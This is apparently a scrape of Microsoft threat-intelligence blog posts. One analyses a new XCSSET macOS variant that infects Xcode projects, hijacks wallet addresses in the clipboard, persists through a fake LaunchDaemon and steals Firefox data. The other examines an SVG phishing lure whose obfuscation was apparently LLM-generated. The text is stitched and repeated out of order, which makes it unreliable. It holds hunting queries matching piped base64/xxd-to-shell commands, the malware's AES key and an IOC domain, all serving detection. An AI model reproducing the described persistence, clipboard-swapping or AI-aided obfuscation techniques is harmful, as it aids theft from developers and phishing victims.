Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
Suspicious commands while building an Xcode project
Search for suspicious commands related to this XCSSET when an Xcode project is being built.
DeviceProcessEvents
| where ProcessCommandLine has_all("echo", "xxd -p -r", "| sh") or ProcessCommandLine has_all("echo", "base64 -d", "| sh")
| where InitiatingProcessFileName has_any ("sh", "bash", "zsh")
| where InitiatingProcessCommandLine contains "/Developer/Xcode/DerivedData"
Suspicious commands executed by XCSSET info-stealer module
Search for suspicious commands related to decryption logic of data received from C2.
DeviceProcessEvents
| where ProcessCommandLine has_any ("base64 --decode", "base64 -d") and ProcessCommandLine has_all ("openssl enc -d", "cut -c1-32")
Suspicious application creation
Search for suspicious applications created in Temp folder by this XCSSET.
DeviceFileEvents
| where FolderPath matches regex @"/tmp/[a-zA-Z]\.app"
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Microsoft Threat Intelligence has identified yet another XCSSET variant in the wild that introduces further updates and new modules beyond those detailed in our March 2025 blog post. The XCSSET malware is designed to infect Xcode projects, typically used by software developers, and run while an Xcode project is being built. We assess that this mode of infection and propagation banks on project files being shared among developers building Apple or macOS-related applications.
This new variant of XCSSET brings key changes related to browser targeting, clipboard hijacking, and persistence mechanisms. It employs sophisticated encryption and obfuscation techniques, uses run-only compiled AppleScripts for stealthy execution, and expands its data exfiltration capabilities to include Firefox browser data. It also adds another persistence mechanism through LaunchDaemon entries.
This variant features a submodule designed to monitor the clipboard and references a downloaded configuration file containing address regex patterns associated with various digital wallets. If a pattern match is detected, XCSSET is capable of substituting the clipboard content with its own predefined set of wallet addresses.
In this blog, we will discuss the new modules added to the XCSSET’s inventory and key changes to existing ones. While we’re only seeing this new XCSSET variant in limited attacks as of this writing, we’re publishing our comprehensive analysis to increase awareness of this evolving threat. We shared these findings with Apple and collaborated with GitHub to take down repositories affected by XCSSET. This work reflects our broader commitment to disrupting attacks and dismantling attacker operations. Alongside our findings, we are sharing actionable detections, recommendations, and best practices to help organizations defend against this threat with confidence.
Analysis
The latest XCSSET variant follows a four-stage infection chain. The initial three stages are consistent with those observed in previous variants, as described in our previous blog. This analysis begins with the fourth stage, which includes the boot() function and its associated calls to download and run submodules.
boot() function of the fourth-stage script
The new variant introduces modifications to the boot function. These include additional checks for Firefox browser and modified logic for Telegram existence check. This stage also has multiple new modules that it downloads and executes.
Older variant:
Figure 1. boot() function of the earlier variant
New variant:
Figure 2. boot() function of the latest version
In the following sections, we examine changes to existing submodules as well as additional modules in this variant.
vexyeqj [Older variant: seizecj] (Info-stealer)
In comparison to the previous variant, several commands in this script are commented out. Additionally, it downloads a module called bnk, which is executed using osascript, with the domain supplied as a parameter. It then waits for three seconds and deletes the downloaded file.
Figure 3. Main logic of the Info-stealer submodule
The bnk file is a run-only compiled AppleScript. Direct decompilation of run-only compiled AppleScript is generally considered challenging or not feasible; however, the AppleScript disassembler project on Github can be used to disassemble the code for analysis.
The script defines several functions for purposes such as data validation, encryption, decryption, obtaining additional data from command and control (C2), and logging. The script is executed with the domain as its parameter.
Figure 4. Disassembled code of the dec() function
Above is a code snippet of the dec() function, which is used to decrypt the data received from C2 server. Parsing the above leads to the command:
In the referenced code, the encrypted data is stored in the variable in. The first 32 characters of this variable are extracted to serve as the initialization vector (IV). The remaining data is then Base64-decoded and provided to the AES decryption function. In this case, the decryption key is a predefined constant, 27860c1670a8d2f3de7bbc74cd754121, which was established and computed within the main function.
The decoded blob appears to be a configuration file. Presented below is a formatted and redacted sample of the decrypted response obtained from the C2 server:
Figure 5. Configuration data received from the C2 server
The following section examines the core logic of the downloaded bnk payload, explaining how the previous information is interpreted and applied.
Firstly, it calls a defined function to obtain the configuration data from the C2 server; this data is decrypted and stored in a variable. Shell commands are executed to retrieve the SerialNumber and the current user.
The clipboard content is retrieved which was determined by checking the AEVT (Apple Event Code) codes. The process then identifies the frontmost application, which is checked against a blocklist defined by the “bad” property in the response from C2. Processing proceeds only if the current clipboard data differs from both the last clipboard entry and the last replaced clipboard data, the length of the clipboard data exceeds 25 characters, and the oD() function does not return true. The oD() function returns true when the first four characters are digits. After the above checks, it then has multiple gates and conditions. The first condition checks if the clipboard length is between 50 < len(clipboard) < 300. It then checks if the clipboard matches the pattern defined in the s record in the response. If it matches, the clipboard data is formatted in a record type string and is exfiltrated to the C2 server. The transmitted data is also AES-encrypted.
In the second condition, the script verifies whether the clipboard length is between 25 and 65, whether it was executed with a single argument, and whether cD(clipboard_data) function returns a value greater than 1, which refers to the count of digits in the data passed in argument. If these conditions are met, the script iterates through the sub collection in the C2 response, which includes individual entries for various wallets. Each sub collection entry contains:
a: Contains a list of addresses from which one is selected; the corresponding clipboard data is subsequently replaced.
t: Refers to the wallet identifier.
r: Specifies the regex pattern used for matching addresses associated with this wallet.
ir (optional): Represents a negative regex pattern; addresses matching this pattern should be excluded.
p: Appears to function as a counter or record index.
For each record, it matches pattern for r and ir. If the variable r is true and ir is false, then the program checks whether the clipboard content matches any of the attacker’s addresses. If it does not, it selects an address from the list and replaces the clipboard’s content accordingly. The system subsequently sends information—including the original clipboard data, the replaced data, the wallet name, frontmost application, and other relevant details—to the C2 server. Next, it assigns the value of the clipboard data to the xcP variable, which tracks the most recently replaced clipboard entry. Finally, it updates the xP variable to reflect the current clipboard text, waits for two seconds, and repeats the loop.
neq_cdyd_ilvcmwx (File-stealer)
This module retrieves an additional script from the C2 server, which is saved in the /tmp/ directory. The script is subsequently executed with the domain and moduleName provided as parameters. After execution, the downloaded file is deleted. The module operates as a compiled, run-only AppleScript. The script bears similarity to the txzx_vostfdi module, previously identified as a digital wallet data stealer targeting browsers. During analysis, the C2 server did not supply a folder list; however, it is capable of exfiltrating files back to the C2 server.
Figure 6. Additional script being downloaded and executed
xmyyeqjx (LaunchDaemon-based persistence)
This submodule sets up LaunchDaemon persistence for the ~/.root file, which is created in this module. Here’s a summary of the script:
The process begins by creating several paths and a ~/.root file in the user’s HOME directory, which will contain the payload. The payload performs the following actions:
Changes the directory to /Users/Shared
Checks the network connection
Retrieves the local signed-in user
Sleeps for 30 seconds
Executes the ~/.zshrc file in the context of the signed-in user (.zshrc file was appended with malicious payload in previous submodules)
Sleeps for 30 seconds
Modifies two configurations to execute system commands that disable macOS automatic configuration updates and Rapid Security Response mechanisms.
These commands modify macOS Software Update preferences to disable various critical Apple Updates, including Rapid Security Responses (RSR), Security Configuration updates, and others.
It then calls the doMainFunc() function.
Figure 7. Creation of fake application and downloading of additional script from C2 server.
This function first checks the existence of a LaunchDaemon entry with the presence of .root file in its contents. If it’s not found, it downloads another script from the C2 server, which is again a run-only compiled AppleScript. It then creates a fake application named System Settings.app in the /tmp directory, which basically executes this downloaded AppleScript with two parameters. These parameters appear to be the Label/Plist Name and the file to be persisted (~/.root file). After creating the fake app, it calls another function where it waits for the legitimate System Settings application to get started, upon which it executes the fake application. This behavior is done to masquerade itself as legitimate.
The downloaded script first gets the device’s serial number and the current username by executing shell commands. It then forms path to the LaunchDaemon plist file and constructs its content. It uses the echo command to paste this constructed content to the LaunchDaemon file. The file name is the name that was passed in the argument. Below is an example of the created plist file:
Figure 8. Plist content of the created LaunchDaemon entry
It masquerades with prefix com.google. in plist name and executes the ~/.root file using bash. The echo command is run using “do shell script …. with administrator privileges” which can be implied by the badm AEVT code. It then executes chown command to change owner to root:wheel and sets 644 permissions to the plist file. Lastly, it executes the launchctl load -w command with sudo to start the daemon.
jey [Older Variant: jez] (Git-based persistence)
The command in the older variant executes a direct concatenation of encrypted payload along with the repeated decryption command directly through the shell. In the new variant, the decryption logic is encapsulated within a shell function, which is defined inline and then used to decrypt the encrypted string before passing it to the shell for execution. This change primarily enhances the obfuscation method used by malware.
Old logic:
Figure 9. Payload generation logic in older variant
New logic:
Figure 10. Payload generation logic in the latest variant
iewmilh_cdyd (Info-stealer targeting Firefox)
This new variant has added an info-stealer module to exfiltrate data stored by Firefox. The runMe() function is invoked at first to download a Mach-O FAT binary, which is responsible for all info stealing operations, from the C2 server.
Figure 11. Downloading compiled binary of the HackBrowserData project
This downloaded binary appears to be a modified version of a GitHub project HackBrowserData, which is capable of decrypting and exporting browser data stored by browsers. Passwords, history, credit card information, and cookies are some of the key information it can extract from almost all popular browsers.
Upon downloading, the binary is given executable file permissions, is ad-hoc signed on the victim’s machine, and executed with –b firefox -f json –dir ” & resDir & ” –zip as arguments:
-b: Browser name
-f: format of the output data
–dir: Export directory where the output is stored
–zip: This flag stores the output in compressed ZIP
Once all the data is retrieved, it uploads the compressed ZIP and log file to C2 server with its old method of exfiltrating data in chunks.
Mitigation and protection guidance
Defenders can take the following mitigation steps to defend against this threat:
Run the latest version of your operating systems and applications. Deploy the latest security updates as soon as they become available.
Always inspect and verify Xcode projects downloaded or cloned from repositories, as the malware usually spreads through infected projects.
Exercise caution when copying and pasting sensitive data from the clipboard. Always verify that the pasted content matches the intended source to avoid falling victim to clipboard hijacking or data tampering attacks.
Encourage users to use web browsers that support Microsoft Defender SmartScreen like Microsoft Edge—available on macOS and various platforms—which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.
Microsoft Defender for Endpoint customers can also apply the following mitigations to reduce the environmental attack surface and mitigate the impact of this threat and its payloads:
Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
Enable potentially unwanted application (PUA) protection in block mode to automatically quarantine PUAs like adware. PUA blocking takes effect on endpoint clients after the next signature update or computer restart. PUA blocking takes effect on endpoint clients after the next signature update or computer restart.
Turn on network protection to block connections to malicious domains and IP addresses.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
– Malicious Xcode projects
Microsoft Defender Antivirus – Trojan:MacOS/XCSSET.PB
Microsoft Defender for Endpoint – Possible XCSSET activity
Microsoft Defender for Endpoint – Suspicious file dropped and launched – Suspicious script launched – Network connection by osascript – Suspicious process launched from a world-writable directory
Persistence
– Hidden LaunchDaemon persistence
Microsoft Defender Antivirus – Behavior:MacOS/SuspHiddenPersistence.A1
Microsoft Defender for Endpoint – Suspicious Plist modifications – Suspicious launchctl tool activity
Defense evasion
– Suspicious obfuscated command
Microsoft Defender for Endpoint – Suspicious file or information obfuscation detected
Credential access
– Use of modified HackBrowserData project
Microsoft Defender Antivirus – Trojan:MacOS/HackBrowserData.A
Impact
– Xcode project infection
Microsoft Defender Antivirus – Behavior:MacOS/XCSSET.A
Note: For detections associated with older variants of XCSSET, refer to our March 2025 blog post.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
Suspicious commands while building an Xcode project
Search for suspicious commands related to this XCSSET when an Xcode project is being built.
DeviceProcessEvents
| where ProcessCommandLine has_all("echo", "xxd -p -r", "| sh") or ProcessCommandLine has_all("echo", "base64 -d", "| sh")
| where InitiatingProcessFileName has_any ("sh", "bash", "zsh")
| where InitiatingProcessCommandLine contains "/Developer/Xcode/DerivedData"
Suspicious commands executed by XCSSET info-stealer module
Search for suspicious commands related to decryption logic of data received from C2.
DeviceProcessEvents
| where ProcessCommandLine has_any ("base64 --decode", "base64 -d") and ProcessCommandLine has_all ("openssl enc -d", "cut -c1-32")
Suspicious application creation
Search for suspicious applications created in Temp folder by this XCSSET.
DeviceFileEvents
| where FolderPath matches regex @"/tmp/[a-zA-Z]\.app"
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Microsoft Threat Intelligence recently detected and blocked a credential phishing campaign that likely used AI-generated code to obfuscate its payload and evade traditional defenses. Appearing to be aided by a large language model (LLM), the activity obfuscated its behavior within an SVG file, leveraging business terminology and a synthetic structure to disguise its malicious intent. In analyzing the malicious file, Microsoft Security Copilot assessed that the code was “not something a human would typically write from scratch due to its complexity, verbosity, and lack of practical utility.”
Like many transformative technologies, AI is being adopted by both defenders and cybercriminals. While defenders use AI to detect, analyze, and respond to threats at scale, attackers are experimenting with AI to enhance their own operations, such as by crafting more convincing lures, automating obfuscation, and generating code that mimics legitimate content. Even though the campaign in this case was limited in nature and primarily aimed at US-based organizations, it exemplifies a broader trend of attackers leveraging AI to increase the effectiveness and stealth of their operations. This case also underscores the growing need for defenders to understand and anticipate AI-driven threats.
Despite the sophistication of the obfuscation, the campaign was successfully detected and blocked by Microsoft Defender for Office 365’s AI-powered protection systems, which analyze signals across infrastructure, behavior, and message context that remain largely unaffected by an attacker’s use of AI. By sharing our analysis, we aim to help the security community recognize similar tactics being used by threat actors and reinforce that AI-enhanced threats, while evolving, are not undetectable. As we discuss in this post, an attacker’s use of AI often introduces new artifacts that can be leveraged for detection. By applying these insights and our recommended best practices, organizations can strengthen their own defenses against similar emerging, AI-aided phishing campaigns.
Phishing campaign tactics and payload
On August 18, Microsoft Threat Intelligence detected a phishing campaign leveraging a compromised small business email account to distribute malicious phishing emails intended to steal credentials. The attackers employed a self-addressed email tactic, where the sender and recipient addresses matched, and actual targets were hidden in the BCC field, which is done to attempt to bypass basic detection heuristics. The content of the email was crafted to resemble a file-sharing notification, containing the message:
Figure 1. Phishing email example
Attached to the email was a file named 23mb – PDF- 6 pages.svg, designed to look like a legitimate PDF document even though the file extension indicates it is an SVG file. SVG files (Scalable Vector Graphics) are attractive to attackers because they are text-based and scriptable, allowing them to embed JavaScript and other dynamic content directly within the file. This makes it possible to deliver interactive phishing payloads that appear benign to both users and many security tools. Additionally, SVGs support obfuscation-friendly features such as invisible elements, encoded attributes, and delayed script execution, all of which can be used to evade static analysis and sandboxing.
When opened, the SVG file redirected the user to a webpage that prompted them to complete a CAPTCHA for security verification, a common social engineering tactic used to build trust and delay suspicion. Although our visibility for this incident was limited to the initial landing page due to the activity being detected and blocked, the campaign would have very likely presented a fake sign in page after the CAPTCHA to harvest credentials.
Figure 2. Security verification prompt
An analysis of the SVG code found that it used a unique method of obfuscating its content and behavior. Instead of using cryptographic obfuscation, which is commonly used to obfuscate phishing content, the SVG code in this campaign used business-related language to disguise its malicious activity. It did this in two ways:
First, the beginning of the SVG code was structured to look like a legitimate business analytics dashboard. It contained elements for a supposed Business Performance Dashboard, including chart bars and month labels. These elements, however, were rendered completely invisible to the user by setting their opacity to zero and their fill to transparent. This tactic is designed to mislead anyone casually inspecting the file, making it appear as if the SVG’s sole purpose is to visualize business data. In reality, though, it’s a decoy.
Figure 3. SVG code containing decoy business performance chart
Second, the payload’s functionality was also hidden using a creative use of business terms. Within the file, the attackers encoded the malicious payload using a long sequence of business-related terms. Words like revenue, operations, risk, or shares were concatenated into a hidden data-analytics attribute of an invisible <text> element within the SVG.
Figure 4. Sequence of business-related terms
The terms in this attribute were later used by embedded JavaScript, which systematically processed the business-related words through several transformation steps. Instead of directly including malicious code, the attackers encoded the payload by mapping pairs or sequences of these business terms to specific characters or instructions. As the script runs, it decodes the sequence, reconstructing the hidden functionality from what appears to be harmless business metadata. This obfuscated functionality included redirecting a user’s browser to the initial phishing landing page, triggering browser fingerprinting, and initiating session tracking.
Figure 5. Conversion of business terminology to processable malicious code
Using AI to analyze the campaign
Given the unique methods used to obfuscate the SVG payload’s functionality, we hypothesized that the attacker may have used AI to assist them. We asked Security Copilot to analyze the contents of the SVG file to assess whether it was generated by AI or an LLM. Security Copilot’s analysis indicated that it was highly likely that the code was synthetic and likely generated by an LLM or a tool using one. Security Copilot determined that the code exhibited a level of complexity and verbosity rarely seen in manually written scripts, suggesting it was produced by an AI model rather than crafted by a human.
Security Copilot provided five key indicators to support its conclusion:
Overly descriptive and redundant naming
The function and variable names (e.g., processBusinessMetricsf43e08, parseDataFormatf19e04, convertMetricsDataf98e36, initializeAnalytics4e2250, userIdentifierb8db, securityHash9608) follow a consistent pattern of descriptive English terms concatenated with random hexadecimal strings. This naming convention is typical of AI/LLM-generated code, which often appends random suffixes to avoid collisions and increase obfuscation.
Figure 6. Example of overly descriptive variable and function names
Modular and over-engineered code structure
The code structure is highly modular, with clear separation of concerns and repeated use of similar logic blocks (e.g., mapping business terms to character codes, block reversal, offset correction, token-based validation). This systematic approach is characteristic of AI/LLM output, which tends to over-engineer and generalize solutions.
Figure 7. Example of over-engineered logic parsing the business terminology
Generic comments
Comments are verbose, generic, and use formal business language (“Advanced business intelligence data processor”, “Business terminology parser for standardized format conversion”, “Generate secure processing token for data validation”), which is a hallmark of AI-generated documentation.
Figure 8. Examples of verbose, generic comments.
Formulaic obfuscation techniques
The obfuscation techniques (e.g., encoding business terms, multi-stage data transformation, dynamic function creation) are implemented in a way that is both thorough and formulaic, matching the style of AI/LLM code generation.
Unusual use of CDATA and XML declaration
The SVG code includes both an XML declaration and a CDATA-wrapped script, which is more typical of LLM-generated code that aims to be “technically correct” or to mimic documentation examples, even when such elements are unnecessary for the attack to function.
Figure 9. Example of the SVG’s XML declaration and CDATA-wrapped script
Using AI to detect the campaign
While the use of AI to obfuscate phishing payloads may seem like a significant leap in attacker sophistication, it’s important to understand that AI does not fundamentally change the core artifacts that security systems rely on to detect phishing threats. AI-generated code may be more complex or syntactically polished, but it still operates within the same behavioral and infrastructural boundaries as human-crafted attacks.
Microsoft Defender for Office 365 uses AI and machine learning models trained to detect phishing and are designed to identify patterns across multiple dimensions—not just the payload itself. These include:
Attack infrastructure (such as suspicious domain characteristics, hosting behavior)
Tactics, techniques, and procedures (TTPs) (such as the use of redirects, CAPTCHA gates, session tracking)
Impersonation strategies (such as pretending to share documents, mimicking file-sharing notifications)
Message context and delivery patterns (such as self-addressed emails, BCC usage, mismatched sender/recipient behavior)
These signals are largely unaffected by whether the payload was written by a human or an LLM. In fact, AI-generated obfuscation often introduces synthetic artifacts, like verbose naming, redundant logic, or unnatural encoding schemes, that can become new detection signals themselves.
Despite the use of AI to obfuscate the SVG payload, this campaign was blocked by Microsoft Defender for Office 365’s detection system through a combination of infrastructure analysis, behavioral indicators, and message context, none of which were impacted by the use of AI. Signals used to detect this campaign included the following:
Use of self-addressed email with BCCed recipients – This tactic is commonly used to attempt to bypass basic email heuristics and hide the true recipient list.
Suspicious file type/name – SVG files, generally, have been an emerging payload used in phishing attacks and the attachments in this campaign were named to resemble a PDF, which is atypical for legitimate document sharing.
Redirect to malicious infrastructure – The SVG payload redirected to a domain that had previously been identified as being linked to phishing content.
General use of code obfuscation – While the SVG file contained novel obfuscation tactics that hadn’t been seen before, the presence of obfuscation alone was an indicator of potentially malicious intent.
Suspicious network behavior – Automated analysis of the phishing site indicated that it employed session tracking and browser fingerprinting, which can be used to selectively serve content based on geography or environment, a behavior used by some phishing actors.
Recommendations
While this campaign was limited in scope and effectively blocked, similar techniques are increasingly being leveraged by a range of threat actors. Sharing our findings equips organizations to identify and mitigate these emerging threats, regardless of the specific threat actor behind them. Microsoft Threat Intelligence recommends the following mitigations, which are effective against a range of phishing threats, including those that may use AI-generated code.
Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft 365 applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links used in phishing and other attacks.
Turn on Zero-hour auto purge (ZAP) in Defender for Office 365 to quarantine sent mail in response to newly-acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attack tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
-Phishing emails sent from a compromised small business email account. -Phishing emails contained an attached SVG file.
–Microsoft Defender for Office 365 tenant admins can use Threat Explorer to query associated SVG file attachments using file type, file extension, or attachment file name fields. The rule description from Threat Explorer is: This SVG has traits consistent with credential phishing campaigns. –Microsoft Defender XDR Malicious email-sending activity from a risky user
Execution
-Embedded JavaScript within the attached SVG file executed upon opening in a browser.
Defense evasion
-Obfuscation using invisible SVG elements and encoded business terminology. -Fake CAPTCHA, browser fingerprinting, and session tracking used to evade detection.
Impact
-Potential credential theft if targeted user completes the phishing flow.
–Microsoft Defender XDR Risky sign in attempt following a possible phishing campaign
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Hunting queries
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Below are the queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt threats across both Microsoft first party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub using an ARM template or manually.
Detect network domain indicators of compromise using ASIM
The following query checks IP addresses and domain IOCs across data sources supported by ASIM network session parser:
//Domain list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic([]);
let ioc_domains = dynamic(["kmnl.cpfcenters.de"]);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
Detect domain and URL indicators of compromise using ASIM
The following query checks domain and URL IOCs across data sources supported by ASIM web session parser:
// Domain list - _Im_WebSession
let ioc_domains = dynamic(["kmnl.cpfcenters.de”]);
_Im_WebSession (url_has_any = ioc_domains)
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Microsoft Threat Intelligence recently detected and blocked a credential phishing campaign that likely used AI-generated code to obfuscate its payload and evade traditional defenses. Appearing to be aided by a large language model (LLM), the activity obfuscated its behavior within an SVG file, leveraging business terminology and a synthetic structure to disguise its malicious intent. In analyzing the malicious file, Microsoft Security Copilot assessed that the code was “not something a human would typically write from scratch due to its complexity, verbosity, and lack of practical utility.”
Like many transformative technologies, AI is being adopted by both defenders and cybercriminals. While defenders use AI to detect, analyze, and respond to threats at scale, attackers are experimenting with AI to enhance their own operations, such as by crafting more convincing lures, automating obfuscation, and generating code that mimics legitimate content. Even though the campaign in this case was limited in nature and primarily aimed at US-based organizations, it exemplifies a broader trend of attackers leveraging AI to increase the effectiveness and stealth of their operations. This case also underscores the growing need for defenders to understand and anticipate AI-driven threats.
Despite the sophistication of the obfuscation, the campaign was successfully detected and blocked by Microsoft Defender for Office 365’s AI-powered protection systems, which analyze signals across infrastructure, behavior, and message context that remain largely unaffected by an attacker’s use of AI. By sharing our analysis, we aim to help the security community recognize similar tactics being used by threat actors and reinforce that AI-enhanced threats, while evolving, are not undetectable. As we discuss in this post, an attacker’s use of AI often introduces new artifacts that can be leveraged for detection. By applying these insights and our recommended best practices, organizations can strengthen their own defenses against similar emerging, AI-aided phishing campaigns.
Phishing campaign tactics and payload
On August 18, Microsoft Threat Intelligence detected a phishing campaign leveraging a compromised small business email account to distribute malicious phishing emails intended to steal credentials. The attackers employed a self-addressed email tactic, where the sender and recipient addresses matched, and actual targets were hidden in the BCC field, which is done to attempt to bypass basic detection heuristics. The content of the email was crafted to resemble a file-sharing notification, containing the message:
Figure 1. Phishing email example
Attached to the email was a file named 23mb – PDF- 6 pages.svg, designed to look like a legitimate PDF document even though the file extension indicates it is an SVG file. SVG files (Scalable Vector Graphics) are attractive to attackers because they are text-based and scriptable, allowing them to embed JavaScript and other dynamic content directly within the file. This makes it possible to deliver interactive phishing payloads that appear benign to both users and many security tools. Additionally, SVGs support obfuscation-friendly features such as invisible elements, encoded attributes, and delayed script execution, all of which can be used to evade static analysis and sandboxing.
When opened, the SVG file redirected the user to a webpage that prompted them to complete a CAPTCHA for security verification, a common social engineering tactic used to build trust and delay suspicion. Although our visibility for this incident was limited to the initial landing page due to the activity being detected and blocked, the campaign would have very likely presented a fake sign in page after the CAPTCHA to harvest credentials.
Figure 2. Security verification prompt
An analysis of the SVG code found that it used a unique method of obfuscating its content and behavior. Instead of using cryptographic obfuscation, which is commonly used to obfuscate phishing content, the SVG code in this campaign used business-related language to disguise its malicious activity. It did this in two ways:
First, the beginning of the SVG code was structured to look like a legitimate business analytics dashboard. It contained elements for a supposed Business Performance Dashboard, including chart bars and month labels. These elements, however, were rendered completely invisible to the user by setting their opacity to zero and their fill to transparent. This tactic is designed to mislead anyone casually inspecting the file, making it appear as if the SVG’s sole purpose is to visualize business data. In reality, though, it’s a decoy.
Figure 3. SVG code containing decoy business performance chart
Second, the payload’s functionality was also hidden using a creative use of business terms. Within the file, the attackers encoded the malicious payload using a long sequence of business-related terms. Words like revenue, operations, risk, or shares were concatenated into a hidden data-analytics attribute of an invisible <text> element within the SVG.
Figure 4. Sequence of business-related terms
The terms in this attribute were later used by embedded JavaScript, which systematically processed the business-related words through several transformation steps. Instead of directly including malicious code, the attackers encoded the payload by mapping pairs or sequences of these business terms to specific characters or instructions. As the script runs, it decodes the sequence, reconstructing the hidden functionality from what appears to be harmless business metadata. This obfuscated functionality included redirecting a user’s browser to the initial phishing landing page, triggering browser fingerprinting, and initiating session tracking.
Figure 5. Conversion of business terminology to processable malicious code
Using AI to analyze the campaign
Given the unique methods used to obfuscate the SVG payload’s functionality, we hypothesized that the attacker may have used AI to assist them. We asked Security Copilot to analyze the contents of the SVG file to assess whether it was generated by AI or an LLM. Security Copilot’s analysis indicated that it was highly likely that the code was synthetic and likely generated by an LLM or a tool using one. Security Copilot determined that the code exhibited a level of complexity and verbosity rarely seen in manually written scripts, suggesting it was produced by an AI model rather than crafted by a human.
Security Copilot provided five key indicators to support its conclusion:
Overly descriptive and redundant naming
The function and variable names (e.g., processBusinessMetricsf43e08, parseDataFormatf19e04, convertMetricsDataf98e36, initializeAnalytics4e2250, userIdentifierb8db, securityHash9608) follow a consistent pattern of descriptive English terms concatenated with random hexadecimal strings. This naming convention is typical of AI/LLM-generated code, which often appends random suffixes to avoid collisions and increase obfuscation.
Figure 6. Example of overly descriptive variable and function names
Modular and over-engineered code structure
The code structure is highly modular, with clear separation of concerns and repeated use of similar logic blocks (e.g., mapping business terms to character codes, block reversal, offset correction, token-based validation). This systematic approach is characteristic of AI/LLM output, which tends to over-engineer and generalize solutions.
Figure 7. Example of over-engineered logic parsing the business terminology
Generic comments
Comments are verbose, generic, and use formal business language (“Advanced business intelligence data processor”, “Business terminology parser for standardized format conversion”, “Generate secure processing token for data validation”), which is a hallmark of AI-generated documentation.
Figure 8. Examples of verbose, generic comments.
Formulaic obfuscation techniques
The obfuscation techniques (e.g., encoding business terms, multi-stage data transformation, dynamic function creation) are implemented in a way that is both thorough and formulaic, matching the style of AI/LLM code generation.
Unusual use of CDATA and XML declaration
The SVG code includes both an XML declaration and a CDATA-wrapped script, which is more typical of LLM-generated code that aims to be “technically correct” or to mimic documentation examples, even when such elements are unnecessary for the attack to function.
Figure 9. Example of the SVG’s XML declaration and CDATA-wrapped script
Using AI to detect the campaign
While the use of AI to obfuscate phishing payloads may seem like a significant leap in attacker sophistication, it’s important to understand that AI does not fundamentally change the core artifacts that security systems rely on to detect phishing threats. AI-generated code may be more complex or syntactically polished, but it still operates within the same behavioral and infrastructural boundaries as human-crafted attacks.
Microsoft Defender for Office 365 uses AI and machine learning models trained to detect phishing and are designed to identify patterns across multiple dimensions—not just the payload itself. These include:
Attack infrastructure (such as suspicious domain characteristics, hosting behavior)
Tactics, techniques, and procedures (TTPs) (such as the use of redirects, CAPTCHA gates, session tracking)
Impersonation strategies (such as pretending to share documents, mimicking file-sharing notifications)
Message context and delivery patterns (such as self-addressed emails, BCC usage, mismatched sender/recipient behavior)
